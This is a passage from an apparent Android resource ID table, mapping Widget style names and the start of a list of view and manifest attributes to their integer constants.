'Widget.ActionBar.TabBar' : 16974068,
'Widget.ActionBar.TabText' : 16974067,
'Widget.ActionBar.TabView' : 16974066,
'Widget.ActionButton' : 16973956,
'Widget.ActionButton.CloseMode' : 16973960,
'Widget.ActionButton.Overflow' : 16973959,
'Widget.AutoCompleteTextView' : 16973863,
'Widget.Button' : 16973844,
'Widget.Button.Inset' : 16973845,
'Widget.Button.Small' : 16973846,
'Widget.Button.Toggle' : 16973847,
'Widget.CalendarView' : 16974059,
'Widget.CompoundButton' : 16973848,
'Widget.CompoundButton.CheckBox' : 16973849,
'Widget.CompoundButton.RadioButton' : 16973850,
'Widget.CompoundButton.Star' : 16973851,
'Widget.DatePicker' : 16974062,
'Widget.DeviceDefault' : 16974144,
'Widget.DeviceDefault.ActionBar' : 16974187,
'Widget.DeviceDefault.ActionBar.Solid' : 16974195,
'Widget.DeviceDefault.ActionBar.TabBar' : 16974194,
'Widget.DeviceDefault.ActionBar.TabText' : 16974193,
'Widget.DeviceDefault.ActionBar.TabView' : 16974192,
'Widget.DeviceDefault.ActionButton' : 16974182,
'Widget.DeviceDefault.ActionButton.CloseMode' : 16974186,
'Widget.DeviceDefault.ActionButton.Overflow' : 16974183,
'Widget.DeviceDefault.ActionButton.TextButton' : 16974184,
'Widget.DeviceDefault.ActionMode' : 16974185,
'Widget.DeviceDefault.AutoCompleteTextView' : 16974151,
'Widget.DeviceDefault.Button' : 16974145,
'Widget.DeviceDefault.Button.Borderless' : 16974188,
'Widget.DeviceDefault.Button.Borderless.Small' : 16974149,
'Widget.DeviceDefault.Button.Inset' : 16974147,
'Widget.DeviceDefault.Button.Small' : 16974146,
'Widget.DeviceDefault.Button.Toggle' : 16974148,
'Widget.DeviceDefault.CalendarView' : 16974190,
'Widget.DeviceDefault.CheckedTextView' : 16974299,
'Widget.DeviceDefault.CompoundButton.CheckBox' : 16974152,
'Widget.DeviceDefault.CompoundButton.RadioButton' : 16974169,
'Widget.DeviceDefault.CompoundButton.Star' : 16974173,
'Widget.DeviceDefault.DatePicker' : 16974191,
'Widget.DeviceDefault.DropDownItem' : 16974177,
'Widget.DeviceDefault.DropDownItem.Spinner' : 16974178,
'Widget.DeviceDefault.EditText' : 16974154,
'Widget.DeviceDefault.ExpandableListView' : 16974155,
'Widget.DeviceDefault.FastScroll' : 16974313,
'Widget.DeviceDefault.GridView' : 16974156,
'Widget.DeviceDefault.HorizontalScrollView' : 16974171,
'Widget.DeviceDefault.ImageButton' : 16974157,
'Widget.DeviceDefault.Light' : 16974196,
'Widget.DeviceDefault.Light.ActionBar' : 16974243,
'Widget.DeviceDefault.Light.ActionBar.Solid' : 16974247,
'Widget.DeviceDefault.Light.ActionBar.Solid.Inverse' : 16974248,
'Widget.DeviceDefault.Light.ActionBar.TabBar' : 16974246,
'Widget.DeviceDefault.Light.ActionBar.TabBar.Inverse' : 16974249,
'Widget.DeviceDefault.Light.ActionBar.TabText' : 16974245,
'Widget.DeviceDefault.Light.ActionBar.TabText.Inverse' : 16974251,
'Widget.DeviceDefault.Light.ActionBar.TabView' : 16974244,
'Widget.DeviceDefault.Light.ActionBar.TabView.Inverse' : 16974250,
'Widget.DeviceDefault.Light.ActionButton' : 16974239,
'Widget.DeviceDefault.Light.ActionButton.CloseMode' : 16974242,
'Widget.DeviceDefault.Light.ActionButton.Overflow' : 16974240,
'Widget.DeviceDefault.Light.ActionMode' : 16974241,
'Widget.DeviceDefault.Light.ActionMode.Inverse' : 16974252,
'Widget.DeviceDefault.Light.AutoCompleteTextView' : 16974203,
'Widget.DeviceDefault.Light.Button' : 16974197,
'Widget.DeviceDefault.Light.Button.Borderless.Small' : 16974201,
'Widget.DeviceDefault.Light.Button.Inset' : 16974199,
'Widget.DeviceDefault.Light.Button.Small' : 16974198,
'Widget.DeviceDefault.Light.Button.Toggle' : 16974200,
'Widget.DeviceDefault.Light.CalendarView' : 16974238,
'Widget.DeviceDefault.Light.CheckedTextView' : 16974300,
'Widget.DeviceDefault.Light.CompoundButton.CheckBox' : 16974204,
'Widget.DeviceDefault.Light.CompoundButton.RadioButton' : 16974224,
'Widget.DeviceDefault.Light.CompoundButton.Star' : 16974228,
'Widget.DeviceDefault.Light.DropDownItem' : 16974232,
'Widget.DeviceDefault.Light.DropDownItem.Spinner' : 16974233,
'Widget.DeviceDefault.Light.EditText' : 16974206,
'Widget.DeviceDefault.Light.ExpandableListView' : 16974207,
'Widget.DeviceDefault.Light.FastScroll' : 16974315,
'Widget.DeviceDefault.Light.GridView' : 16974208,
'Widget.DeviceDefault.Light.HorizontalScrollView' : 16974226,
'Widget.DeviceDefault.Light.ImageButton' : 16974209,
'Widget.DeviceDefault.Light.ListPopupWindow' : 16974235,
'Widget.DeviceDefault.Light.ListView' : 16974210,
'Widget.DeviceDefault.Light.ListView.DropDown' : 16974205,
'Widget.DeviceDefault.Light.MediaRouteButton' : 16974296,
'Widget.DeviceDefault.Light.PopupMenu' : 16974236,
'Widget.DeviceDefault.Light.PopupWindow' : 16974211,
'Widget.DeviceDefault.Light.ProgressBar' : 16974212,
'Widget.DeviceDefault.Light.ProgressBar.Horizontal' : 16974213,
'Widget.DeviceDefault.Light.ProgressBar.Inverse' : 16974217,
'Widget.DeviceDefault.Light.ProgressBar.Large' : 16974216,
'Widget.DeviceDefault.Light.ProgressBar.Large.Inverse' : 16974219,
'Widget.DeviceDefault.Light.ProgressBar.Small' : 16974214,
'Widget.DeviceDefault.Light.ProgressBar.Small.Inverse' : 16974218,
'Widget.DeviceDefault.Light.ProgressBar.Small.Title' : 16974215,
'Widget.DeviceDefault.Light.RatingBar' : 16974221,
'Widget.DeviceDefault.Light.RatingBar.Indicator' : 16974222,
'Widget.DeviceDefault.Light.RatingBar.Small' : 16974223,
'Widget.DeviceDefault.Light.ScrollView' : 16974225,
'Widget.DeviceDefault.Light.SeekBar' : 16974220,
'Widget.DeviceDefault.Light.Spinner' : 16974227,
'Widget.DeviceDefault.Light.StackView' : 16974316,
'Widget.DeviceDefault.Light.Tab' : 16974237,
'Widget.DeviceDefault.Light.TabWidget' : 16974229,
'Widget.DeviceDefault.Light.TextView' : 16974202,
'Widget.DeviceDefault.Light.TextView.SpinnerItem' : 16974234,
'Widget.DeviceDefault.Light.WebTextView' : 16974230,
'Widget.DeviceDefault.Light.WebView' : 16974231,
'Widget.DeviceDefault.ListPopupWindow' : 16974180,
'Widget.DeviceDefault.ListView' : 16974158,
'Widget.DeviceDefault.ListView.DropDown' : 16974153,
'Widget.DeviceDefault.MediaRouteButton' : 16974295,
'Widget.DeviceDefault.PopupMenu' : 16974181,
'Widget.DeviceDefault.PopupWindow' : 16974159,
'Widget.DeviceDefault.ProgressBar' : 16974160,
'Widget.DeviceDefault.ProgressBar.Horizontal' : 16974161,
'Widget.DeviceDefault.ProgressBar.Large' : 16974164,
'Widget.DeviceDefault.ProgressBar.Small' : 16974162,
'Widget.DeviceDefault.ProgressBar.Small.Title' : 16974163,
'Widget.DeviceDefault.RatingBar' : 16974166,
'Widget.DeviceDefault.RatingBar.Indicator' : 16974167,
'Widget.DeviceDefault.RatingBar.Small' : 16974168,
'Widget.DeviceDefault.ScrollView' : 16974170,
'Widget.DeviceDefault.SeekBar' : 16974165,
'Widget.DeviceDefault.Spinner' : 16974172,
'Widget.DeviceDefault.StackView' : 16974314,
'Widget.DeviceDefault.Tab' : 16974189,
'Widget.DeviceDefault.TabWidget' : 16974174,
'Widget.DeviceDefault.TextView' : 16974150,
'Widget.DeviceDefault.TextView.SpinnerItem' : 16974179,
'Widget.DeviceDefault.WebTextView' : 16974175,
'Widget.DeviceDefault.WebView' : 16974176,
'Widget.DropDownItem' : 16973867,
'Widget.DropDownItem.Spinner' : 16973868,
'Widget.EditText' : 16973859,
'Widget.ExpandableListView' : 16973860,
'Widget.FastScroll' : 16974309,
'Widget.FragmentBreadCrumbs' : 16973961,
'Widget.Gallery' : 16973877,
'Widget.GridView' : 16973874,
'Widget.Holo' : 16973962,
'Widget.Holo.ActionBar' : 16974004,
'Widget.Holo.ActionBar.Solid' : 16974113,
'Widget.Holo.ActionBar.TabBar' : 16974071,
'Widget.Holo.ActionBar.TabText' : 16974070,
'Widget.Holo.ActionBar.TabView' : 16974069,
'Widget.Holo.ActionButton' : 16973999,
'Widget.Holo.ActionButton.CloseMode' : 16974003,
'Widget.Holo.ActionButton.Overflow' : 16974000,
'Widget.Holo.ActionButton.TextButton' : 16974001,
'Widget.Holo.ActionMode' : 16974002,
'Widget.Holo.AutoCompleteTextView' : 16973968,
'Widget.Holo.Button' : 16973963,
'Widget.Holo.Button.Borderless' : 16974050,
'Widget.Holo.Button.Borderless.Small' : 16974106,
'Widget.Holo.Button.Inset' : 16973965,
'Widget.Holo.Button.Small' : 16973964,
'Widget.Holo.Button.Toggle' : 16973966,
'Widget.Holo.CalendarView' : 16974060,
'Widget.Holo.CheckedTextView' : 16974297,
'Widget.Holo.CompoundButton.CheckBox' : 16973969,
'Widget.Holo.CompoundButton.RadioButton' : 16973986,
'Widget.Holo.CompoundButton.Star' : 16973990,
'Widget.Holo.DatePicker' : 16974063,
'Widget.Holo.DropDownItem' : 16973994,
'Widget.Holo.DropDownItem.Spinner' : 16973995,
'Widget.Holo.EditText' : 16973971,
'Widget.Holo.ExpandableListView' : 16973972,
'Widget.Holo.GridView' : 16973973,
'Widget.Holo.HorizontalScrollView' : 16973988,
'Widget.Holo.ImageButton' : 16973974,
'Widget.Holo.Light' : 16974005,
'Widget.Holo.Light.ActionBar' : 16974049,
'Widget.Holo.Light.ActionBar.Solid' : 16974114,
'Widget.Holo.Light.ActionBar.Solid.Inverse' : 16974115,
'Widget.Holo.Light.ActionBar.TabBar' : 16974074,
'Widget.Holo.Light.ActionBar.TabBar.Inverse' : 16974116,
'Widget.Holo.Light.ActionBar.TabText' : 16974073,
'Widget.Holo.Light.ActionBar.TabText.Inverse' : 16974118,
'Widget.Holo.Light.ActionBar.TabView' : 16974072,
'Widget.Holo.Light.ActionBar.TabView.Inverse' : 16974117,
'Widget.Holo.Light.ActionButton' : 16974045,
'Widget.Holo.Light.ActionButton.CloseMode' : 16974048,
'Widget.Holo.Light.ActionButton.Overflow' : 16974046,
'Widget.Holo.Light.ActionMode' : 16974047,
'Widget.Holo.Light.ActionMode.Inverse' : 16974119,
'Widget.Holo.Light.AutoCompleteTextView' : 16974011,
'Widget.Holo.Light.Button' : 16974006,
'Widget.Holo.Light.Button.Borderless.Small' : 16974107,
'Widget.Holo.Light.Button.Inset' : 16974008,
'Widget.Holo.Light.Button.Small' : 16974007,
'Widget.Holo.Light.Button.Toggle' : 16974009,
'Widget.Holo.Light.CalendarView' : 16974061,
'Widget.Holo.Light.CheckedTextView' : 16974298,
'Widget.Holo.Light.CompoundButton.CheckBox' : 16974012,
'Widget.Holo.Light.CompoundButton.RadioButton' : 16974032,
'Widget.Holo.Light.CompoundButton.Star' : 16974036,
'Widget.Holo.Light.DropDownItem' : 16974040,
'Widget.Holo.Light.DropDownItem.Spinner' : 16974041,
'Widget.Holo.Light.EditText' : 16974014,
'Widget.Holo.Light.ExpandableListView' : 16974015,
'Widget.Holo.Light.GridView' : 16974016,
'Widget.Holo.Light.HorizontalScrollView' : 16974034,
'Widget.Holo.Light.ImageButton' : 16974017,
'Widget.Holo.Light.ListPopupWindow' : 16974043,
'Widget.Holo.Light.ListView' : 16974018,
'Widget.Holo.Light.ListView.DropDown' : 16974013,
'Widget.Holo.Light.MediaRouteButton' : 16974294,
'Widget.Holo.Light.PopupMenu' : 16974044,
'Widget.Holo.Light.PopupWindow' : 16974019,
'Widget.Holo.Light.ProgressBar' : 16974020,
'Widget.Holo.Light.ProgressBar.Horizontal' : 16974021,
'Widget.Holo.Light.ProgressBar.Inverse' : 16974025,
'Widget.Holo.Light.ProgressBar.Large' : 16974024,
'Widget.Holo.Light.ProgressBar.Large.Inverse' : 16974027,
'Widget.Holo.Light.ProgressBar.Small' : 16974022,
'Widget.Holo.Light.ProgressBar.Small.Inverse' : 16974026,
'Widget.Holo.Light.ProgressBar.Small.Title' : 16974023,
'Widget.Holo.Light.RatingBar' : 16974029,
'Widget.Holo.Light.RatingBar.Indicator' : 16974030,
'Widget.Holo.Light.RatingBar.Small' : 16974031,
'Widget.Holo.Light.ScrollView' : 16974033,
'Widget.Holo.Light.SeekBar' : 16974028,
'Widget.Holo.Light.Spinner' : 16974035,
'Widget.Holo.Light.Tab' : 16974052,
'Widget.Holo.Light.TabWidget' : 16974037,
'Widget.Holo.Light.TextView' : 16974010,
'Widget.Holo.Light.TextView.SpinnerItem' : 16974042,
'Widget.Holo.Light.WebTextView' : 16974038,
'Widget.Holo.Light.WebView' : 16974039,
'Widget.Holo.ListPopupWindow' : 16973997,
'Widget.Holo.ListView' : 16973975,
'Widget.Holo.ListView.DropDown' : 16973970,
'Widget.Holo.MediaRouteButton' : 16974293,
'Widget.Holo.PopupMenu' : 16973998,
'Widget.Holo.PopupWindow' : 16973976,
'Widget.Holo.ProgressBar' : 16973977,
'Widget.Holo.ProgressBar.Horizontal' : 16973978,
'Widget.Holo.ProgressBar.Large' : 16973981,
'Widget.Holo.ProgressBar.Small' : 16973979,
'Widget.Holo.ProgressBar.Small.Title' : 16973980,
'Widget.Holo.RatingBar' : 16973983,
'Widget.Holo.RatingBar.Indicator' : 16973984,
'Widget.Holo.RatingBar.Small' : 16973985,
'Widget.Holo.ScrollView' : 16973987,
'Widget.Holo.SeekBar' : 16973982,
'Widget.Holo.Spinner' : 16973989,
'Widget.Holo.Tab' : 16974051,
'Widget.Holo.TabWidget' : 16973991,
'Widget.Holo.TextView' : 16973967,
'Widget.Holo.TextView.SpinnerItem' : 16973996,
'Widget.Holo.WebTextView' : 16973992,
'Widget.Holo.WebView' : 16973993,
'Widget.ImageButton' : 16973862,
'Widget.ImageWell' : 16973861,
'Widget.KeyboardView' : 16973911,
'Widget.ListPopupWindow' : 16973957,
'Widget.ListView' : 16973870,
'Widget.ListView.DropDown' : 16973872,
'Widget.ListView.Menu' : 16973873,
'Widget.ListView.White' : 16973871,
'Widget.Material' : 16974413,
'Widget.Material.ActionBar' : 16974414,
'Widget.Material.ActionBar.Solid' : 16974415,
'Widget.Material.ActionBar.TabBar' : 16974416,
'Widget.Material.ActionBar.TabText' : 16974417,
'Widget.Material.ActionBar.TabView' : 16974418,
'Widget.Material.ActionButton' : 16974419,
'Widget.Material.ActionButton.CloseMode' : 16974420,
'Widget.Material.ActionButton.Overflow' : 16974421,
'Widget.Material.ActionMode' : 16974422,
'Widget.Material.AutoCompleteTextView' : 16974423,
'Widget.Material.Button' : 16974424,
'Widget.Material.ButtonBar' : 16974431,
'Widget.Material.ButtonBar.AlertDialog' : 16974432,
'Widget.Material.Button.Borderless' : 16974425,
'Widget.Material.Button.Borderless.Colored' : 16974426,
'Widget.Material.Button.Borderless.Small' : 16974427,
'Widget.Material.Button.Inset' : 16974428,
'Widget.Material.Button.Small' : 16974429,
'Widget.Material.Button.Toggle' : 16974430,
'Widget.Material.CalendarView' : 16974433,
'Widget.Material.CheckedTextView' : 16974434,
'Widget.Material.CompoundButton.CheckBox' : 16974435,
'Widget.Material.CompoundButton.RadioButton' : 16974436,
'Widget.Material.CompoundButton.Star' : 16974437,
'Widget.Material.DatePicker' : 16974438,
'Widget.Material.DropDownItem' : 16974439,
'Widget.Material.DropDownItem.Spinner' : 16974440,
'Widget.Material.EditText' : 16974441,
'Widget.Material.ExpandableListView' : 16974442,
'Widget.Material.FastScroll' : 16974443,
'Widget.Material.GridView' : 16974444,
'Widget.Material.HorizontalScrollView' : 16974445,
'Widget.Material.ImageButton' : 16974446,
'Widget.Material.Light' : 16974478,
'Widget.Material.Light.ActionBar' : 16974479,
'Widget.Material.Light.ActionBar.Solid' : 16974480,
'Widget.Material.Light.ActionBar.TabBar' : 16974481,
'Widget.Material.Light.ActionBar.TabText' : 16974482,
'Widget.Material.Light.ActionBar.TabView' : 16974483,
'Widget.Material.Light.ActionButton' : 16974484,
'Widget.Material.Light.ActionButton.CloseMode' : 16974485,
'Widget.Material.Light.ActionButton.Overflow' : 16974486,
'Widget.Material.Light.ActionMode' : 16974487,
'Widget.Material.Light.AutoCompleteTextView' : 16974488,
'Widget.Material.Light.Button' : 16974489,
'Widget.Material.Light.ButtonBar' : 16974496,
'Widget.Material.Light.ButtonBar.AlertDialog' : 16974497,
'Widget.Material.Light.Button.Borderless' : 16974490,
'Widget.Material.Light.Button.Borderless.Colored' : 16974491,
'Widget.Material.Light.Button.Borderless.Small' : 16974492,
'Widget.Material.Light.Button.Inset' : 16974493,
'Widget.Material.Light.Button.Small' : 16974494,
'Widget.Material.Light.Button.Toggle' : 16974495,
'Widget.Material.Light.CalendarView' : 16974498,
'Widget.Material.Light.CheckedTextView' : 16974499,
'Widget.Material.Light.CompoundButton.CheckBox' : 16974500,
'Widget.Material.Light.CompoundButton.RadioButton' : 16974501,
'Widget.Material.Light.CompoundButton.Star' : 16974502,
'Widget.Material.Light.DatePicker' : 16974503,
'Widget.Material.Light.DropDownItem' : 16974504,
'Widget.Material.Light.DropDownItem.Spinner' : 16974505,
'Widget.Material.Light.EditText' : 16974506,
'Widget.Material.Light.ExpandableListView' : 16974507,
'Widget.Material.Light.FastScroll' : 16974508,
'Widget.Material.Light.GridView' : 16974509,
'Widget.Material.Light.HorizontalScrollView' : 16974510,
'Widget.Material.Light.ImageButton' : 16974511,
'Widget.Material.Light.ListPopupWindow' : 16974512,
'Widget.Material.Light.ListView' : 16974513,
'Widget.Material.Light.ListView.DropDown' : 16974514,
'Widget.Material.Light.MediaRouteButton' : 16974515,
'Widget.Material.Light.PopupMenu' : 16974516,
'Widget.Material.Light.PopupMenu.Overflow' : 16974517,
'Widget.Material.Light.PopupWindow' : 16974518,
'Widget.Material.Light.ProgressBar' : 16974519,
'Widget.Material.Light.ProgressBar.Horizontal' : 16974520,
'Widget.Material.Light.ProgressBar.Inverse' : 16974521,
'Widget.Material.Light.ProgressBar.Large' : 16974522,
'Widget.Material.Light.ProgressBar.Large.Inverse' : 16974523,
'Widget.Material.Light.ProgressBar.Small' : 16974524,
'Widget.Material.Light.ProgressBar.Small.Inverse' : 16974525,
'Widget.Material.Light.ProgressBar.Small.Title' : 16974526,
'Widget.Material.Light.RatingBar' : 16974527,
'Widget.Material.Light.RatingBar.Indicator' : 16974528,
'Widget.Material.Light.RatingBar.Small' : 16974529,
'Widget.Material.Light.ScrollView' : 16974530,
'Widget.Material.Light.SearchView' : 16974531,
'Widget.Material.Light.SeekBar' : 16974532,
'Widget.Material.Light.SegmentedButton' : 16974533,
'Widget.Material.Light.Spinner' : 16974535,
'Widget.Material.Light.Spinner.Underlined' : 16974536,
'Widget.Material.Light.StackView' : 16974534,
'Widget.Material.Light.Tab' : 16974537,
'Widget.Material.Light.TabWidget' : 16974538,
'Widget.Material.Light.TextView' : 16974539,
'Widget.Material.Light.TextView.SpinnerItem' : 16974540,
'Widget.Material.Light.TimePicker' : 16974541,
'Widget.Material.Light.WebTextView' : 16974542,
'Widget.Material.Light.WebView' : 16974543,
'Widget.Material.ListPopupWindow' : 16974447,
'Widget.Material.ListView' : 16974448,
'Widget.Material.ListView.DropDown' : 16974449,
'Widget.Material.MediaRouteButton' : 16974450,
'Widget.Material.PopupMenu' : 16974451,
'Widget.Material.PopupMenu.Overflow' : 16974452,
'Widget.Material.PopupWindow' : 16974453,
'Widget.Material.ProgressBar' : 16974454,
'Widget.Material.ProgressBar.Horizontal' : 16974455,
'Widget.Material.ProgressBar.Large' : 16974456,
'Widget.Material.ProgressBar.Small' : 16974457,
'Widget.Material.ProgressBar.Small.Title' : 16974458,
'Widget.Material.RatingBar' : 16974459,
'Widget.Material.RatingBar.Indicator' : 16974460,
'Widget.Material.RatingBar.Small' : 16974461,
'Widget.Material.ScrollView' : 16974462,
'Widget.Material.SearchView' : 16974463,
'Widget.Material.SeekBar' : 16974464,
'Widget.Material.SegmentedButton' : 16974465,
'Widget.Material.Spinner' : 16974467,
'Widget.Material.Spinner.Underlined' : 16974468,
'Widget.Material.StackView' : 16974466,
'Widget.Material.Tab' : 16974469,
'Widget.Material.TabWidget' : 16974470,
'Widget.Material.TextView' : 16974471,
'Widget.Material.TextView.SpinnerItem' : 16974472,
'Widget.Material.TimePicker' : 16974473,
'Widget.Material.Toolbar' : 16974474,
'Widget.Material.Toolbar.Button.Navigation' : 16974475,
'Widget.Material.WebTextView' : 16974476,
'Widget.Material.WebView' : 16974477,
'Widget.PopupMenu' : 16973958,
'Widget.PopupWindow' : 16973878,
'Widget.ProgressBar' : 16973852,
'Widget.ProgressBar.Horizontal' : 16973855,
'Widget.ProgressBar.Inverse' : 16973915,
'Widget.ProgressBar.Large' : 16973853,
'Widget.ProgressBar.Large.Inverse' : 16973916,
'Widget.ProgressBar.Small' : 16973854,
'Widget.ProgressBar.Small.Inverse' : 16973917,
'Widget.RatingBar' : 16973857,
'Widget.ScrollView' : 16973869,
'Widget.SeekBar' : 16973856,
'Widget.Spinner' : 16973864,
'Widget.Spinner.DropDown' : 16973955,
'Widget.StackView' : 16974310,
'Widget.TabWidget' : 16973876,
'Widget.TextView' : 16973858,
'Widget.TextView.PopupMenu' : 16973865,
'Widget.TextView.SpinnerItem' : 16973866,
'Widget.Toolbar' : 16974311,
'Widget.Toolbar.Button.Navigation' : 16974312,
'Widget.WebView' : 16973875,
},
'attr': {
'theme' : 16842752,
'label' : 16842753,
'icon' : 16842754,
'name' : 16842755,
'manageSpaceActivity' : 16842756,
'allowClearUserData' : 16842757,
'permission' : 16842758,
'readPermission' : 16842759,
'writePermission' : 16842760,
'protectionLevel' : 16842761,
'permissionGroup' : 16842762,
'sharedUserId' : 16842763,
'hasCode' : 16842764,
'persistent' : 16842765,
'enabled' : 16842766,
'debuggable' : 16842767,
'exported' : 16842768,
'process' : 16842769,
'taskAffinity' : 16842770,
'multiprocess' : 16842771,
'finishOnTaskLaunch' : 16842772,
'clearTaskOnLaunch' : 16842773,
'stateNotNeeded' : 16842774,
'excludeFromRecents' : 16842775,
'authorities' : 16842776,
'syncable' : 16842777,
'initOrder' : 16842778,
'grantUriPermissions' : 16842779,
'priority' : 16842780,
'launchMode' : 16842781,
'screenOrientation' : 16842782,
'configChanges' : 16842783,
'description' : 16842784,
'targetPackage' : 16842785,
'handleProfiling' : 16842786,
'functionalTest' : 16842787,
'value' : 16842788,
'resource' : 16842789,
'mimeType' : 16842790,
'scheme' : 16842791,
'host' : 16842792,
'port' : 16842793,
'path' : 16842794,
'pathPrefix' : 16842795,
'pathPattern' : 16842796,
'action' : 16842797,
'data' : 16842798,
'targetClass' : 16842799,
'colorForeground' : 16842800,
'colorBackground' : 16842801,
'backgroundDimAmount' : 16842802,
'disabledAlpha' : 16842803,
'textAppearance' : 16842804,
'textAppearanceInverse' : 16842805,
'textColorPrimary' : 16842806,
'textColorPrimaryDisableOnly' : 16842807,
'textColorSecondary' : 16842808,
'textColorPrimaryInverse' : 16842809,
'textColorSecondaryInverse' : 16842810,
'textColorPrimaryNoDisable' : 16842811,
'textColorSecondaryNoDisable' : 16842812,
'textColorPrimaryInverseNoDisable' : 16842813,
'textColorSecondaryInverseNoDisable' : 16842814,
'textColorHintInverse' : 16842815,
'textAppearanceLarge' : 16842816,
'textAppearanceMedium' : 16842817,
'textAppearanceSmall' : 16842818,
'textAppearanceLargeInverse' : 16842819,
'textAppearanceMediumInverse' : 16842820,
'textAppearanceSmallInverse' : 16842821,
'textCheckMark' : 16842822,
'textCheckMarkInverse' : 16842823,
'buttonStyle' : 16842824,
'buttonStyleSmall' : 16842825,
'buttonStyleInset' : 16842826,
'buttonStyleToggle' : 16842827,
'galleryItemBackground' : 16842828,
'listPreferredItemHeight' : 16842829,
'expandableListPreferredItemPaddingLeft' : 16842830,
'expandableListPreferredChildPaddingLeft' : 16842831,
'expandableListPreferredItemIndicatorLeft' : 16842832,
'expandableListPreferredItemIndicatorRight' : 16842833,
'expandableListPreferredChildIndicatorLeft' : 16842834,
'expandableListPreferredChildIndicatorRight' : 16842835,
'windowBackground' : 16842836,
'windowFrame' : 16842837,
'windowNoTitle' : 16842838,
'windowIsFloating' : 16842839,
'windowIsTranslucent' : 16842840,
'windowContentOverlay' : 16842841,
'windowTitleSize' : 16842842,
'windowTitleStyle' : 16842843,
'windowTitleBackgroundStyle' : 16842844,
'alertDialogStyle' : 16842845,
'panelBackground' : 16842846,
'panelFullBackground' : 16842847,
'panelColorForeground' : 16842848,
'panelColorBackground' : 16842849,
'panelTextAppearance' : 16842850,
'scrollbarSize' : 16842851,
'scrollbarThumbHorizontal' : 16842852,
'scrollbarThumbVertical' : 16842853,
'scrollbarTrackHorizontal' : 16842854,
'scrollbarTrackVertical' : 16842855,
'scrollbarAlwaysDrawHorizontalTrack' : 16842856,
'scrollbarAlwaysDrawVerticalTrack' : 16842857,
'absListViewStyle' : 16842858,
'autoCompleteTextViewStyle' : 16842859,
'checkboxStyle' : 16842860,
'dropDownListViewStyle' : 16842861,
'editTextStyle' : 16842862,
'expandableListViewStyle' : 16842863,
'galleryStyle' : 16842864,
'gridViewStyle' : 16842865,
'imageButtonStyle' : 16842866,
'imageWellStyle' : 16842867,
'listViewStyle' : 16842868,
'listViewWhiteStyle' : 16842869,
'popupWindowStyle' : 16842870,
'progressBarStyle' : 16842871,
'progressBarStyleHorizontal' : 16842872,
'progressBarStyleSmall' : 16842873,
'progressBarStyleLarge' : 16842874,
'seekBarStyle' : 16842875,
'ratingBarStyle' : 16842876,
'ratingBarStyleSmall' : 16842877,
'radioButtonStyle' : 16842878,
'scrollbarStyle' : 16842879,
'scrollViewStyle' : 16842880,
'spinnerStyle' : 16842881,
'starStyle' : 16842882,
'tabWidgetStyle' : 16842883,
'textViewStyle' : 16842884,
'webViewStyle' : 16842885,
'dropDownItemStyle' : 16842886,
'spinnerDropDownItemStyle' : 16842887,
'dropDownHintAppearance' : 16842888,
'spinnerItemStyle' : 16842889,
'mapViewStyle' : 16842890,
'preferenceScreenStyle' : 16842891,
'preferenceCategoryStyle' : 16842892,
'preferenceInformationStyle' : 16842893,
'preferenceStyle' : 16842894,
'checkBoxPreferenceStyle' : 16842895,
'yesNoPreferenceStyle' : 16842896,
'dialogPreferenceStyle' : 16842897,
'editTextPreferenceStyle' : 16842898,
'ringtonePreferenceStyle' : 16842899,
'preferenceLayoutChild' : 16842900,
'textSize' : 16842901,
'typeface' : 16842902,
'textStyle' : 16842903,
'textColor' : 16842904,
'textColorHighlight' : 16842905,
'textColorHint' : 16842906,
'textColorLink' : 16842907,
'state_focused' : 16842908,
'state_window_focused' : 16842909,
'state_enabled' : 16842910,
'state_checkable' : 16842911,
'state_checked' : 16842912,
'state_selected' : 16842913,
'state_active' : 16842914,
'state_single' : 16842915,
'state_first' : 16842916,
'state_middle' : 16842917,
'state_last' : 16842918,
'state_pressed' : 16842919,
'state_expanded' : 16842920,
'state_empty' : 16842921,
'state_above_anchor' : 16842922,
'ellipsize' : 16842923,
'x' : 16842924,
'y' : 16842925,
'windowAnimationStyle' : 16842926,
'gravity' : 16842927,
'autoLink' : 16842928,
'linksClickable' : 16842929,
'entries' : 16842930,
'layout_gravity' : 16842931,
'windowEnterAnimation' : 16842932,
'windowExitAnimation' : 16842933,
'windowShowAnimation' : 16842934,
'windowHideAnimation' : 16842935,
'activityOpenEnterAnimation' : 16842936,
'activityOpenExitAnimation' : 16842937,
'activityCloseEnterAnimation' : 16842938,
'activityCloseExitAnimation' : 16842939,
'taskOpenEnterAnimation' : 16842940,
'taskOpenExitAnimation' : 16842941,
'taskCloseEnterAnimation' : 16842942,
'taskCloseExitAnimation' : 16842943,
'taskToFrontEnterAnimation' : 16842944,
'taskToFrontExitAnimation' : 16842945,
'taskToBackEnterAnimation' : 16842946,
'taskToBackExitAnimation' : 16842947,
'orientation' : 16842948,
'keycode' : 16842949,
'fullDark' : 16842950,
'topDark' : 16842951,
'centerDark' : 16842952,
'bottomDark' : 16842953,
'fullBright' : 16842954,
'topBright' : 16842955,
'centerBright' : 16842956,
'bottomBright' : 16842957,
'bottomMedium' : 16842958,
'centerMedium' : 16842959,
'id' : 16842960,
'tag' : 16842961,
'scrollX' : 16842962,
'scrollY' : 16842963,
'background' : 16842964,
'padding' : 16842965,
'paddingLeft' : 16842966,
'paddingTop' : 16842967,
'paddingRight' : 16842968,
'paddingBottom' : 16842969,
'focusable' : 16842970,
'focusableInTouchMode' : 16842971,
'visibility' : 16842972,
'fitsSystemWindows' : 16842973,
'scrollbars' : 16842974,
'fadingEdge' : 16842975,
'fadingEdgeLength' : 16842976,
'nextFocusLeft' : 16842977,
'nextFocusRight' : 16842978,
'nextFocusUp' : 16842979,
'nextFocusDown' : 16842980,
'clickable' : 16842981,
'longClickable' : 16842982,
'saveEnabled' : 16842983,
'drawingCacheQuality' : 16842984,
'duplicateParentState' : 16842985,
'clipChildren' : 16842986,
'clipToPadding' : 16842987,
'layoutAnimation' : 16842988,
'animationCache' : 16842989,
'persistentDrawingCache' : 16842990,
'alwaysDrawnWithCache' : 16842991,
'addStatesFromChildren' : 16842992,
'descendantFocusability' : 16842993,
'layout' : 16842994,
'inflatedId' : 16842995,
'layout_width' : 16842996,
'layout_height' : 16842997,
'layout_margin' : 16842998,
'layout_marginLeft' : 16842999,
'layout_marginTop' : 16843000,
'layout_marginRight' : 16843001,
'layout_marginBottom' : 16843002,
'listSelector' : 16843003,
'drawSelectorOnTop' : 16843004,
'stackFromBottom' : 16843005,
'scrollingCache' : 16843006,
'textFilterEnabled' : 16843007,
'transcriptMode' : 16843008,
'cacheColorHint' : 16843009,
'dial' : 16843010,
'hand_hour' : 16843011,
'hand_minute' : 16843012,
'format' : 16843013,
'checked' : 16843014,
'button' : 16843015,
